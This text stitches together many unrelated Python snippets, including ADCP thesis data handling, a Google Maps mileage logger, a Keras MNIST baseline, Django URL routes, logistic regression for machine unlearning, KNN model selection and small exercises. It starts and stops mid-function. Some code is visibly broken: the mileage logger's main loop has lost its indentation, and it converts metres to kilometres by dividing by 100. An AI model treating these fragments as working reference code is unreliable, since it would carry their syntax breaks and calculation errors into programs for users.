    a4 = '/home/aidan/thesis/probe_data/panels/2012/flw_stn3_adcp_corrected'
    a5 = '/home/aidan/thesis/probe_data/panels/2012/flw_stn4_adcp_corrected'
    a6 = '/home/aidan/thesis/probe_data/panels/2012/flw_stn5_adcp_corrected'
    a = [a1,a2,a3,a4,a5,a6]
    a = Pool().map(load_panel,a)
    # The corrected panels are 3-D; average over the third axis first.
    a = [a[0],a[1],a[2],a[3].mean(axis=2),a[4].mean(axis=2),a[5].mean(axis=2)]
    a = Pool().map(time_index,a)
    # Flow direction of the corrected data, split by sign into two regimes.
    b = Pool().map(angle,a[3:6])
    b_up = Pool().map(angle_plus,b)
    b_down = Pool().map(angle_minus,b)
    # Join error data with each direction subset (inner join on timestamps).
    a_up1 = a[0].join(b_up[0],how='inner').drop('v',1)
    a_up2 = a[1].join(b_up[1],how='inner').drop('v',1)
    a_up3 = a[2].join(b_up[2],how='inner').drop('v',1)
    a_up = [a_up1,a_up2,a_up3]
    a_down1 = a[0].join(b_down[0],how='inner').drop('v',1)
    a_down2 = a[1].join(b_down[1],how='inner').drop('v',1)
    a_down3 = a[2].join(b_down[2],how='inner').drop('v',1)
    a_down = [a_down1,a_down2,a_down3]
    a_up = Pool().map(getvalues,a_up)
    a_down = Pool().map(getvalues,a_down)
    # Python 2 prints: emit a LaTeX summary table for each direction.
    d = {'Flow Station 3':a_up[0],'Flow Station 4':a_up[1],'Flow Station 5':a_up[2]}
    frame = pd.DataFrame(d)
    x = frame.to_latex()
    print x
    d = {'Flow Station 3':a_down[0],'Flow Station 4':a_down[1],'Flow Station 5':a_down[2]}
    frame = pd.DataFrame(d)
    x = frame.to_latex()
    print x
|
def identify_weapon(character):
    """Return "<name>-<weapon>" for a known Chima character, else a fallback."""
    weapons = {
        "Laval": "Laval-Shado Valious",
        "Cragger": "Cragger-Vengdualize",
        "Lagravis": "Lagravis-Blazeprowlor",
        "Crominus": "Crominus-Grandorius",
        "Tormak": "Tormak-Tygafyre",
        "LiElla": "LiElla-Roarburn",
    }
    return weapons.get(character, "Not a character")
"""Functionality related to binding python functions to specific templated SQL statements."""
from dinao.binding.binders import FunctionBinder
__all__ = ["FunctionBinder", "errors"]
|
# Admission for anyone under age 4 is free
# Admission for anyone between the ages of 4 and 18 is $25
# Admission for anyone age 18 or older is $40
age = int(input('How old are you?\n'))
# V1: print the full message in each branch.
if age < 4:
    print("The cost of your ticket is $0")
elif age < 18:
    print("The cost of your ticket is $25")
else:
    print("The cost of your ticket is $40")
# V2: compute the price first, then print once.
age = int(input('\nHow old are you?\n'))
if age < 4:
    price = 0
elif age < 18:
    price = 25
else:
    price = 40
print(f"The cost of your admission is ${price}")
import threading
import sqlite3
import Queue
import wx
class DBThread(threading.Thread):
    """
    This thread is used to run SQL queries. It allows the UI to remain
    responsive during queries that may take several seconds.
    (Note: the fetch part of the query is usually the slow part. The execute
    part is comparatively fast.)
    The user communicates with this thread via an input Queue. Queries should be
    put into the input Queue using the form:
    ["sync", "SELECT * FROM changes", output Queue]
    ["async", "SELECT * FROM changes", output Queue]
    A None item signals the thread to shut down.
    """
    SQL_CREATE_TABLE = ("CREATE TABLE changes (client TEXT, user TEXT, "
                        "date DATETIME, change INT primary key, description TEXT)")
    # TODO: Are these the proper indices to create?
    SQL_CREATE_INDEX = ("CREATE INDEX idx ON changes (client, user, date, "
                        "change, description)")

    def __init__(self, inputQueue):
        threading.Thread.__init__(self)
        self._inputQueue = inputQueue  # queue of [type, sql, output queue]
        self._outputQueue = None       # destination queue of the current query
        self._queryType = ""           # "sync" or "async"
        self._queryString = ""
        self._sqlCursor = None
        self._sqlConn = None
        self.setDaemon(True)           # don't keep the process alive on exit
        self.start()

    def run(self):
        # NOTE(review): unusual control flow — inputQueue.get(doneFetch)
        # blocks only when the previous fetch is finished (doneFetch True).
        # While a fetch is in progress, the non-blocking get raises
        # Queue.Empty, which lands in the broad `except` below and drives
        # the incremental fetch loop; the except path therefore doubles as
        # the "no new query yet" branch. Confirm this is intentional.
        self._connect()
        doneFetch = False
        while 1:
            try:
                query = self._inputQueue.get(doneFetch)
                # Check if the thread has been signaled to close
                if query is None:
                    self._outputQueue.put(None)
                    break
                self._queryType = query[0]
                self._queryString = query[1]
                self._outputQueue = query[2]
                doneFetch = False
                self._sqlCursor.execute(self._queryString)
            except Exception:
                if not doneFetch:
                    if self._queryType == "async":
                        # Stream the result set in batches of 200 rows.
                        result = self._sqlCursor.fetchmany(200)
                        self._outputQueue.put(result)
                        wx.WakeUpIdle() # Triggers wx Idle events
                        if len(result) == 0:
                            doneFetch = True
                    else:
                        # Synchronous query: deliver everything at once.
                        result = self._sqlCursor.fetchall()
                        self._outputQueue.put(result)
                        wx.WakeUpIdle() # Triggers wx Idle events
                        doneFetch = True

    def _connect(self):
        # TODO: Try loading database completely into memory
        # Setup sqlite database
        sqlConn = sqlite3.connect('p4db')
        sqlConn.text_factory = str
        sqlCursor = sqlConn.cursor()
        # Create the changes table if it doesn't exist
        sqlCursor.execute("SELECT name FROM sqlite_master")
        if(sqlCursor.fetchone() == None):
            sqlCursor.execute(DBThread.SQL_CREATE_TABLE)
            sqlCursor.execute(DBThread.SQL_CREATE_INDEX)
        self._sqlCursor = sqlCursor
        self._sqlConn = sqlConn
|
from MainFrame import *
REFRESH_RATE = 1000
class Ele(Tk):
    # Main application window: fixed 800x800, hosting a single MainFrame.
    def __init__(self):
        Tk.__init__(self)
        self.minsize(width=800, height=800)
        # Fixed-size window: resizing is disabled in both directions.
        self.resizable(width=FALSE, height=FALSE)
        MainFrame(master=self)
|
from datetime import datetime
import googlemaps
import os.path
import re
import xlwt
import yaml
# ---
# Init
# ---
# Excel workbook that will receive one row per trip.
book = xlwt.Workbook(encoding="utf-8")
sheet = book.add_sheet("Kilometers")
# Input/output file names used throughout the script.
file_name_key = "key.txt"
file_name_addresses = "addresses.yaml"
file_name_distances = "distances.yaml"
file_name_data = "data.txt"
# ---
# Google maps
# ---
file_name = file_name_key
try:
    print("Read key file...")
    # The API key is stored in a one-line text file next to the script.
    key = open(file_name, "r").read()
except:
    print("ERROR: " + file_name + " file (for Google maps API) doesn't exist")
    print("Please create the file and paste the your key in it")
    quit()
try:
    print("Init Google maps...")
    gmaps = googlemaps.Client(key=key)
except:
    print("ERROR: The key for Google maps API is invalid")
    quit()
# ---
# Address book
# ---
file_name = file_name_addresses
try:
    print("Read addresses file...")
    f = open(file_name, "r", encoding="utf8")
except:
    print("ERROR: " + file_name + " file (for Google maps API) doesn't exist")
    quit()
try:
    print("Import addresses...")
    # Mapping of short place names -> full postal addresses.
    addresses_book = yaml.safe_load(f) or {}
except yaml.YAMLError as error:
    print("ERROR: " + file_name + " is incorrect")
    print(error)
# ---
# Distances book
# ---
file_name = file_name_distances
# Load previously computed distances so Google Maps isn't queried twice
# for the same trip.
if os.path.isfile(file_name):
    print("Read the distances file...")
    f = open(file_name, "r", encoding="utf8")
    try:
        print("Import the distances...")
        distances_book = yaml.safe_load(f) or {}
    except yaml.YAMLError as error:
        print("ERROR: " + file_name + " is incorrect")
        print(error)
        quit()
else:
    # BUG FIX: the original never initialized distances_book when the cache
    # file did not exist yet, causing a NameError on the first run.
    distances_book = {}
# ---
# Data file
# ---
# Line formats accepted in data.txt:
#   a date:        31/12/2020 (day[/month[/year]])
#   a home marker: home = some_name
#   a trip:        name_a > name_b (either side may be omitted)
#   blank lines and '#' comments are skipped
regex_date = re.compile("^(0|1|2|3)?[0-9](\/(0|1)?[0-9](\/(20)?(0|1|2)[0-9])?)?$")
regex_home = re.compile("^home ?= ?([a-z|A-Z|0-9]+_?)*[a-z|A-Z|0-9]")
regex_trip = re.compile("^(([a-z|A-Z|0-9]+_?)*[a-z|A-Z|0-9])? ?-?> ?(([a-z|A-Z|0-9]+_?)*[a-z|A-Z|0-9])?$")
regex_skip = re.compile("^(#.*)?$")
counter_global = 0  # current line number in data.txt (for error messages)
counter_trip = 0    # current output row in the spreadsheet
day = None
month = None
year = None
home_name = ""
departure_name = ""
arrival_name = ""
file_name = file_name_data
try:
    print("Read addresses file...")
    f = open(file_name, "r", encoding="utf8")
except:
    print("ERROR: " + file_name + " file (for Google maps API) doesn't exist")
    quit()
print("Process the data file...")
for line in f:
line = line.replace(" ", "").rstrip()
counter_global += 1
if (regex_date.match(line)):
date = line.split("/")
day = date[0]
if (len(date) >= 2):
month = date[1]
if (len(date) == 3):
year = date[2]
else:
print("ERROR: Incorrect date in " + file_name)
quit()
departure_name = ""
arrival_name = ""
elif (regex_home.match(line)):
home_name = line.split("=")[1].strip()
if (home_name not in addresses_book):
print("ERROR: Unknown address for " + home_name + " in " + file_name + " (line " + str(counter_global) + ")")
quit()
elif (regex_trip.match(line)):
counter_trip += 1
trip = line.split(">")
if day is None or month is None or year is None:
print("ERROR: You must first initialize a complete date (ex: 31/12/1970) in " + file_name)
quit()
if trip[0]:
departure_name = trip[0]
elif not departure_name and home_name:
departure_name = home_name
elif not departure_name:
print("ERROR: Incorrect departure in " + file_name + " (line " + str(counter_global) + ")")
quit()
if trip[1]:
arrival_name = trip[1]
elif home_name:
arrival_name = home_name
else:
print("ERROR: Incorrect arrival in " + file_name + " (line " + str(counter_global) + ")")
quit()
if departure_name == arrival_name:
print("ERROR: The departure and the arrival cannot be the same in " + file_name + " (line " + str(counter_global) + ")")
quit()
trip = departure_name + " > " + arrival_name
if (departure_name not in addresses_book):
print("ERROR: Address of " + departure_name + " is unknown in " + file_name + " (line " + str(counter_global) + ")")
quit()
elif (arrival_name not in addresses_book):
print("ERROR: Address of " + arrival_name + " is unknown in " + file_name + " (line " + str(counter_global) + ")")
quit()
else:
departure_address = addresses_book[departure_name]
arrival_address = addresses_book[arrival_name]
if (not distances_book or trip not in distances_book):
print("Calculation of " + trip + " using Google Maps API...")
results = gmaps.directions(
departure_address,
arrival_address,
mode = "driving",
departure_time = datetime.now().replace(hour=23),
alternatives = "true"
)
if (len(results) == 0):
print("ERROR: Google Maps couldn't calcute the distance of " + trip + " in " + file_name + " (line " + str(counter_global) + ")")
quit()
distance = None
for result in results:
result = result['legs'][0]['distance']['text'].split(" ")
new_distance = float(result[0])
unit = result[1]
if (unit == "m"):
new_distance = new_distance / 100
if (distance is None or new_distance < distance):
distance = new_distance
distances_book[trip] = distance
else:
distance = distances_book[trip]
sheet.write(counter_trip, 0, day + "/" + month + "/" + year)
sheet.write(counter_trip, 1, departure_address)
sheet.write(counter_trip, 2, arrival_address)
sheet.write(counter_trip, 3, line.replace("_", " ").replace(">", " > "))
sheet.write(counter_trip, 4, distance)
departure_name = arrival_name
elif (not regex_skip.match(line)):
print("ERROR: Unknown line format in " + file_name + " (line " + str(counter_global) + ")")
quit()
f.close()
# ---
# Save calculated distances
# ---
# Persist the distance cache as simple "trip: km" YAML-compatible lines.
f = open(file_name_distances, "w")
if (distances_book):
    for key, value in distances_book.items():
        f.write(key + ": " + str(value) + "\n")
f.close()
print("Success !")
|
# Standup Bot by Christina Aiello, 2017-2020
import re
import random
from logger import Logger
# For logging purposes
def format_minutes_to_have_zero(minutes):
    """Zero-pad a minutes value to two characters for display.

    Accepts None (treated as missing -> "00"), an int, or a numeric string.
    Examples: None -> "00", 5 -> "05", "7" -> "07", 30 -> "30".
    """
    if minutes is None:  # BUG FIX: was `minutes == None`; identity check is the correct idiom
        return "00"
    if int(minutes) < 10:
        return "0" + str(minutes)
    return str(minutes)
# Generate a random 6-digit code
def generate_code():
    """Return a random 6-digit numeric code as a string (leading zeros allowed)."""
    return "".join(str(random.randrange(10)) for _ in range(6))
# Scheduler doesn't like zeros at the start of numbers...
# @param time: string to remove starting zeros from
def remove_starting_zeros_from_time(time):
    r"""Strip at most one leading zero from a time-component string.

    "07" -> "7", "12" -> "12", "0" -> "0".

    BUG FIX: the old regex `0?(\d+)?` returned None for "0" and "" because
    the optional capture group could match nothing; now such inputs are
    returned unchanged, so the scheduler never receives None.
    """
    if time.startswith("0") and len(time) > 1:
        return time[1:]
    return time
# Adds 12 if PM and not noon, else keeps as original time. When we insert
# data from the form into the database, we convert from AM/PM
# to 24-hour time.
def calculate_am_or_pm(reminder_hour, am_or_pm):
    """Convert a 12-hour clock hour plus an 'am'/'pm' flag to 24-hour time.

    PM hours other than 12 get +12; 12am becomes 0. Returns an int.
    """
    event_type = "CalculateAmOrPm"
    Logger.log("Hour is: " + str(reminder_hour) + " and am or pm is: " + am_or_pm, Logger.info, event_type)
    hour = int(reminder_hour)
    if am_or_pm == "pm" and hour != 12:
        hour += 12
    elif am_or_pm == "am" and hour == 12:
        hour = 0
    Logger.log("Hour now is: " + str(hour) + " and am or pm is: " + am_or_pm, Logger.info, event_type)
    return hour
|
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from keras.models import Sequential
from keras.layers import Dense , Dropout , Lambda, Flatten
from keras.optimizers import Adam ,RMSprop
from sklearn.model_selection import train_test_split
# Baseline for the MNIST "Digit Recognizer" task: a single softmax layer
# on standardized 28x28x1 images, then a Kaggle submission CSV.
# NOTE(review): written against Keras 1.x / old pandas — `.ix`, `nb_epoch`,
# `nb_val_samples` and `predict_classes` were all removed in newer
# versions; confirm the pinned library versions before running.
train = pd.read_csv("../datasets/train.csv")
test = pd.read_csv("../datasets/test.csv")
# Column 0 is the label; the remaining 784 columns are pixel values.
X_train = (train.ix[:,1:].values).astype('float32') # all pixel values
y_train = train.ix[:,0].values.astype('int32') # only labels i.e targets digits
X_test = test.values.astype('float32')
# Reshape flat 784-vectors into image tensors; the first reshape is
# redundant (the (n, 28, 28, 1) shape below is what the model consumes).
X_train = X_train.reshape(X_train.shape[0], 28, 28)
X_train = X_train.reshape(X_train.shape[0], 28, 28, 1)
X_test = X_test.reshape(X_test.shape[0], 28, 28, 1)
# Global mean/std over the whole training set, closed over by standardize().
mean_px = X_train.mean().astype(np.float32)
std_px = X_train.std().astype(np.float32)
def standardize(x):
    """Center and scale pixel values with the global training mean/std."""
    return (x-mean_px)/std_px
from keras.utils.np_utils import to_categorical
y_train= to_categorical(y_train)  # one-hot encode the digit labels
num_classes = y_train.shape[1]
seed = 43
np.random.seed(seed)
# (duplicate imports kept as-is)
from keras.models import Sequential
from keras.layers.core import Lambda , Dense, Flatten, Dropout
from keras.callbacks import EarlyStopping
from keras.layers import BatchNormalization, Convolution2D , MaxPooling2D
# Model: standardize -> flatten -> 10-way softmax (multinomial logistic regression).
model= Sequential()
model.add(Lambda(standardize,input_shape=(28,28,1)))
model.add(Flatten())
model.add(Dense(10, activation='softmax'))
from keras.optimizers import RMSprop
model.compile(optimizer=RMSprop(lr=0.001),
              loss='categorical_crossentropy',
              metrics=['accuracy'])
from keras.preprocessing import image
gen = image.ImageDataGenerator()  # no augmentation, just batching
from sklearn.model_selection import train_test_split
# Hold out 10% of the training data for validation.
X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=0.10, random_state=42)
batches = gen.flow(X_train, y_train, batch_size=64)
val_batches=gen.flow(X_val, y_val, batch_size=64)
# Keras 1.x API: the second positional argument is samples_per_epoch.
history=model.fit_generator(batches, batches.n, nb_epoch=1,
                    validation_data=val_batches, nb_val_samples=val_batches.n)
history_dict = history.history
# history_dict.keys()
# Raise the learning rate and train one more epoch on the 90% split.
model.optimizer.lr=0.01
gen = image.ImageDataGenerator()
batches = gen.flow(X_train, y_train, batch_size=64)
history=model.fit_generator(batches, batches.n, nb_epoch=1)
# Predict digit classes for the test set and write the submission file.
predictions = model.predict_classes(X_test, verbose=0)
submissions=pd.DataFrame({"ImageId": list(range(1,len(predictions)+1)),
                          "Label": predictions})
submissions.to_csv("keras_way.csv", index=False, header=True)
# Minimal Django settings — presumably used only to run the pgcomments
# test suite; TODO confirm this is never loaded in production.
SECRET_KEY = '-dummy-key-'  # placeholder value; never use outside tests
INSTALLED_APPS = [
    'pgcomments',
]
DATABASES = {
    'default': {
        # Only the engine is pinned; NAME/USER/HOST are expected to come
        # from environment defaults — TODO confirm how tests connect.
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
    },
}
|
"""back URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from .views import HomeMobileView,MainView,HomeWxAuthView,ActivityView,ActivityDetailView,GrainView,GrainAddChildView,StageView,MyView,GrainOrderView
from .views import GrainEditChildView,GrainFeedbackView,GrainFeedbackNoteView
from .views import TMainClassMemberView,TMainAddClassView
from .views import TMyView
from .views import StLoginView
from .views import MyExitView
from .views import MyFriendsView
from .views import ShareFeedView
urlpatterns = [
    # Mobile landing page and WeChat domain-verification file.
    url(r'^$', HomeMobileView.as_view(),),
    url(r'^MP_verify_HAONGKquSEXIsxKN.txt$', HomeWxAuthView.as_view(),),
    # Student login and main dashboard.
    url(r'^stlogin$', StLoginView.as_view(),name="stlogin"),
    url(r'^main$', MainView.as_view(),name="main"),
    # Activities: list filtered by one flag character, then detail pages.
    # NOTE(review): the class [t|h|n] also matches a literal '|' — [thn]
    # was probably intended; confirm before changing (URLs are live).
    url(r'^main/activity/([t|h|n]{1})$', ActivityView.as_view(),name="main.activity"),
    url(r'^main/activity/detail/.*$', ActivityDetailView.as_view(),name="main.activity.detail"),
    # "Grain" pages — the specific sub-routes are listed before ^main/grain$.
    url(r'^main/grain/order$', GrainOrderView.as_view(),name="main.order"),
    url(r'^main/grain$', GrainView.as_view(),name="main.grain"),
    url(r'^main/grain/addchild$', GrainAddChildView.as_view(),name="main.grain.addchild"),
    url(r'^main/grain/editchild/.*$', GrainEditChildView.as_view(),name="main.grain.editchild"),
    url(r'^main/grain/feednote/([0-9]+)$', GrainFeedbackNoteView.as_view(),name="main.grain.feedbacknote"),
    url(r'^main/grain/feedback/([0-9]+)/([0-9]+)', GrainFeedbackView.as_view(),name="main.grain.feedback"),
    # NOTE(review): [-1-9]+ matches '-' and digits 1-9 but not 0 — confirm.
    url(r'^main/stage/([-1-9]+)', StageView.as_view(),name="main.stage"),
    # Personal pages.
    url(r'^main/my$', MyView.as_view(),name="main.my"),
    url(r'^main/grain/friends$',MyFriendsView.as_view(),name="main.friends"),
    url(r'^main/exit$', MyExitView.as_view(),name="main.myexit"),
    # Teacher-side pages.
    url(r'^tmain/classmember/.*$', TMainClassMemberView.as_view(),name="tmain.classmember"),
    url(r'^tmain/addclass/$', TMainAddClassView.as_view(),name="tmain.addclass"),
    url(r'^tmain/my$', TMyView.as_view(),name="tmain.my"),
    # Shared feedback link with three numeric path parameters.
    url(r'^share/([0-9]+)/([0-9]+)/([0-9]+)$', ShareFeedView.as_view(),name="share"),
]
|
import numpy as np
import pandas as pd
import clean_data
import pdb
import copy
class LogisticReg:
    """Implement Algorithm 1 from Descent-to-Delete.

    Regularized logistic regression with labels y in {-1, +1}, trained by
    projected gradient descent onto the unit L2 ball (requires ||theta|| <= 1).
    """
    def __init__(self, theta, l2_penalty=.1):
        # theta: initial parameter vector (should satisfy ||theta|| <= 1)
        # l2_penalty: strength of the L2 regularizer
        self.l2_penalty = l2_penalty
        self.theta = theta
        # Optimization constants used to derive the PGD step size:
        #   strong   - strong-convexity parameter (= l2_penalty)
        #   smooth   - smoothness parameter
        #              NOTE(review): 4 - l2_penalty looks unusual; per-sample
        #              logistic loss is 1/4-smooth — confirm against the paper.
        #   diameter - diameter of the feasible set (unit ball => 2.0)
        #   lip      - Lipschitz constant of the loss
        self.constants_dict = {'strong': self.l2_penalty, 'smooth': 4 - self.l2_penalty, 'diameter': 2.0,
                'lip': 1.0 + self.l2_penalty}
    def gradient_loss_fn(self, X, y):
        """Gradient at self.theta of the average regularized logistic loss.

        X: (n, d) design matrix; y: length-n vector of +/-1 labels.
        """
        n = X.shape[0]
        # Per-sample gradient rows: -y_i * x_i / (1 + exp(y_i * <x_i, theta>)).
        log_grad = np.dot(np.diag(-y/(1 + np.exp(y*np.dot(X, self.theta)))), X)
        # Ones-vector dot product == column-wise sum of the per-sample rows.
        log_grad_sum = np.dot(np.ones(n), log_grad)
        reg_grad = self.l2_penalty*self.theta
        return (reg_grad + (1/n)*log_grad_sum)
    def get_constants(self):
        # must have ||theta|| <= 1
        return self.constants_dict
    def proj_gradient_step(self, X, y):
        """One projected-gradient step: theta <- Proj_ball(theta - eta * grad)."""
        # Standard step size for strongly-convex + smooth objectives.
        eta = 2.0/(self.constants_dict['strong'] + self.constants_dict['smooth'])
        #eta = 0.5
        current_theta = self.theta
        grad = self.gradient_loss_fn(X, y)
        # gradient update
        #next_theta = copy.deepcopy(self.theta)-eta*grad
        next_theta = current_theta - eta*grad
        # Project back onto the unit L2 ball if the step left it.
        if np.sum(np.power(next_theta, 2)) > 1:
            next_theta = next_theta/(clean_data.l2_norm(next_theta))
        #if np.sum(self.theta == next_theta) == len(next_theta):
            #pdb.set_trace()
            # print('equal')
        self.theta = next_theta
    def predict(self, X):
        """Return a pandas Series of +/-1 label predictions (threshold 0.5)."""
        probs = 1.0/(1+np.exp(-np.dot(X, self.theta)))
        return pd.Series([1 if p >= .5 else -1 for p in probs])
if __name__ == "__main__":
    # Smoke test on the communities dataset.
    X, y = clean_data.clean_communities(scale_and_center=True, intercept=True, normalize=True)
    # Start from a feasible point on the unit sphere.
    par = np.ones(X.shape[1])
    par = par/clean_data.l2_norm(par)
    model = LogisticReg(theta=par, l2_penalty=1.0)
    # BUG FIX: gradient_loss_fn takes (X, y); the extra leading `par`
    # argument made this call raise a TypeError.
    model.gradient_loss_fn(X, y)
    yhat = model.predict(X)
|
################################################################################
# Cristian Alexandrescu #
# 2163013577ba2bc237f22b3f4d006856 #
# 11a4bb2c77aca6a9927b85f259d9af10db791ce5cf884bb31e7f7a889d4fb385 #
# bc9a53289baf23d369484f5343ed5d6c #
################################################################################
# Problem 13049 - Combination Lock #
import sys

def min_steps(initial, target):
    """Minimum total single-step wheel turns to go from `initial` to `target`.

    Each position is a digit wheel that can rotate either direction, so a
    wheel's cost is min(forward distance, backward distance) mod 10.
    """
    total = 0
    for a, b in zip(initial, target):
        diff = (ord(a) - ord(b)) % 10
        total += min(diff, (10 - diff) % 10)
    return total

def main():
    """Read the UVa 13049 input from stdin and print one line per case."""
    fin = sys.stdin
    no_cases = int(fin.readline())
    for case_no in range(1, no_cases + 1):
        no_wheels, state_initial, state_target = fin.readline().split()
        # Only the first `no_wheels` positions count, matching the input spec.
        n = int(no_wheels)
        print("Case " + str(case_no) + ": " + str(min_steps(state_initial[:n], state_target[:n])))

if __name__ == "__main__":
    main()
import tensorflow as tf
from object_detection.utils import config_util
from object_detection.protos import pipeline_pb2
from google.protobuf import text_format
# Directory layout configuration
WORKSPACE_PATH = 'boy_and_girl/workspace'
SCRIPTS_PATH = 'boy_and_girl/scripts'
APIMODEL_PATH = 'boy_and_girl/models'
ANNOTATION_PATH = WORKSPACE_PATH + '/annotations'
IMAGE_PATH = WORKSPACE_PATH + '/images'
MODEL_PATH = WORKSPACE_PATH + '/models'
PRETRAINED_MODEL_PATH = WORKSPACE_PATH + '/pre-trained-models'
CONFIG_PATH = MODEL_PATH + '/my_ssd_mobnet/pipeline.config'
CHECKPOINT_PATH = MODEL_PATH + '/my_ssd_mobnet/'
CUSTOM_MODEL_NAME = 'my_ssd_mobnet'
# Re-derives the same value as above, this time via CUSTOM_MODEL_NAME.
CONFIG_PATH = MODEL_PATH+'/'+CUSTOM_MODEL_NAME+'/pipeline.config'
# Label configuration: write the two-class label map in pbtxt format.
labels = [
    {'name': 'BOY', 'id': 1},
    {'name': 'GIRL', 'id': 2}
]
with open(ANNOTATION_PATH + '/label_map.pbtxt', 'w') as f:
    for label in labels:
        f.write('item { \n')
        f.write('\tname:\'{}\'\n'.format(label['name']))
        f.write('\tid:{}\n'.format(label['id']))
        f.write('}\n')
# Model configuration: load the pipeline config, patch it for this
# 2-class fine-tuning run, and write it back in place.
config = config_util.get_configs_from_pipeline_file(CONFIG_PATH)
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
with tf.io.gfile.GFile(CONFIG_PATH, "r") as f:
    proto_str = f.read()
    text_format.Merge(proto_str, pipeline_config)
pipeline_config.model.ssd.num_classes = 2
pipeline_config.train_config.batch_size = 4
pipeline_config.train_config.fine_tune_checkpoint = PRETRAINED_MODEL_PATH+'/ssd_mobilenet_v2_fpnlite_320x320_coco17_tpu-8/checkpoint/ckpt-0'
pipeline_config.train_config.fine_tune_checkpoint_type = "detection"
pipeline_config.train_input_reader.label_map_path= ANNOTATION_PATH + '/label_map.pbtxt'
pipeline_config.train_input_reader.tf_record_input_reader.input_path[:] = [ANNOTATION_PATH + '/train.record']
pipeline_config.eval_input_reader[0].label_map_path = ANNOTATION_PATH + '/label_map.pbtxt'
pipeline_config.eval_input_reader[0].tf_record_input_reader.input_path[:] = [ANNOTATION_PATH + '/test.record']
config_text = text_format.MessageToString(pipeline_config)
# NOTE(review): mode is "wb" but config_text is a str — this happens to be
# accepted by tf.io.gfile; plain "w" would be the conventional mode here.
with tf.io.gfile.GFile(CONFIG_PATH, "wb") as f:
    f.write(config_text)
# Print the command line that launches training with the patched config.
print("""python {}/research/object_detection/model_main_tf2.py --model_dir={}/{} --pipeline_config_path={}/{}/pipeline.config --num_train_steps=2000""".format(APIMODEL_PATH, MODEL_PATH,CUSTOM_MODEL_NAME,MODEL_PATH,CUSTOM_MODEL_NAME))
|
"""Utilities functions."""
import pandas as pd
import torch as th
from pytoda.files import read_smi
from torch.utils.data import Dataset
class ProteinDataset(Dataset):
    """Protein data for conditioning.

    Loads a protein sequence table from a .smi or .csv file, drops the
    rows reserved for testing, and yields each remaining row's index
    label, optionally passed through a transform.
    """

    def __init__(
        self, protein_data_path, protein_test_idx, transform=None, *args, **kwargs
    ):
        """
        :param protein_data_path: protein data file(.smi or .csv) path
        :param protein_test_idx: positional indices of rows held out for testing
        :param transform: optional transform applied to each returned item
        """
        # Load protein sequence data according to the file extension.
        if protein_data_path.endswith(".smi"):
            frame = read_smi(protein_data_path, names=["Sequence"])
        elif protein_data_path.endswith(".csv"):
            frame = pd.read_csv(protein_data_path, index_col="entry_name")
        else:
            raise TypeError(
                f"{protein_data_path.split('.')[-1]} files are not supported."
            )
        self.transform = transform
        # Keep the full table, then work with a copy minus the test rows.
        self.origin_protein_df = frame
        self.protein_df = frame.drop(frame.index[protein_test_idx])

    def __len__(self):
        return len(self.protein_df)

    def __getitem__(self, idx):
        if th.is_tensor(idx):
            idx = idx.tolist()
        # `.name` of an iloc row is its index label (the entry name).
        item = self.protein_df.iloc[idx].name
        return self.transform(item) if self.transform else item
|
# Default implementation of brute force KNN from Scipy
import numpy as np
from sklearn.neighbors import KNeighborsClassifier
from model import *
from util import split_train_test
import util
class default_knn:
    """Brute-force KNN built on scikit-learn's KNeighborsClassifier.

    Chooses k in [k_min, k_max) by mean 10-fold cross-validated accuracy,
    then fits a final brute-force model on the full dataset with that k.
    """
    # Class-level defaults; __init__ rebinds each of these on the instance.
    samples = None   # project dataset object (provides get_X / get_y / n_folds)
    knn = None       # the fitted sklearn classifier
    scores = None    # NOTE(review): never assigned anywhere — confirm before removing
    n = -1           # chosen neighbor count
    k_max = -1
    k_min = -1
    def __init__(self, dataset, min_k, max_k):
        self.samples = dataset
        self.k_min = min_k
        self.k_max = max_k
        self.n = self.find_global_accuracies()
        self.knn = KNeighborsClassifier(n_neighbors=self.n, algorithm='brute')
        self.knn.fit(self.samples.get_X(), self.samples.get_y())
    def find_global_accuracies(self):
        """Return the k with the best mean 10-fold CV accuracy.

        NOTE(review): range(k_min, k_max) excludes k_max itself, and an
        empty range (k_max == k_min) falls back to k = 1 — confirm both
        behaviors are intended.
        """
        scores = {}
        ten_folds = self.samples.n_folds(10)
        if self.k_max - self.k_min == 0:
            return 1
        for i in range(self.k_min, self.k_max):
            global_accuracy = 0
            for fold in range(0, len(ten_folds)):
                # One fold as the test set, the remaining nine as training data.
                test, train = util.split_train_test(ten_folds, fold)
                temp_knn = KNeighborsClassifier(n_neighbors=i, algorithm='brute')
                temp_knn.fit(train.get_X(), train.get_y())
                score = temp_knn.score(test.get_X(), test.get_y())
                global_accuracy += float(score)
            global_accuracy /= 10
            scores[i] = global_accuracy
        # util.sort_dict(scores, 1) presumably orders entries by accuracy so
        # the best k is result[0][0]. TODO confirm the sort direction.
        result = util.sort_dict(scores, 1)
        return result[0][0]
    def get_score(self, dataset):
        """Return (accuracy on `dataset`, chosen k)."""
        return self.knn.score(dataset.get_X(), dataset.get_y()), self.n
|
#Each element greater that the current element is shifted forward
def insertionSort(length, elements):
    """Sort the first `length` items of `elements` ascending, in place.

    Classic insertion sort: each item is shifted left past every larger
    predecessor. Returns the (mutated) list for convenience.
    """
    for idx in range(length):
        key = elements[idx]
        pos = idx
        # Shift larger predecessors one slot to the right.
        while pos > 0 and elements[pos - 1] > key:
            elements[pos] = elements[pos - 1]
            pos -= 1
        elements[pos] = key
    return elements
def findXBinarySearch(min,max,x):
    """Recursively binary-search for x and return its 1-based rank.

    Relies on module-level globals set by the driver code below:
      - result:  the sorted list being searched
      - reverse: True when ranks should be counted from the far end
      - length:  number of elements
    `min`/`max` keep their original names for call compatibility even
    though they shadow builtins.
    """
    mid = min+max >> 1  # '+' binds tighter than '>>', so this is (min+max)//2
    if(x<result[mid]):
        if(reverse):
            return findXBinarySearch(mid+1,max,x)
        return findXBinarySearch(min,mid-1,x)
    if(x>result[mid]):
        if(reverse):
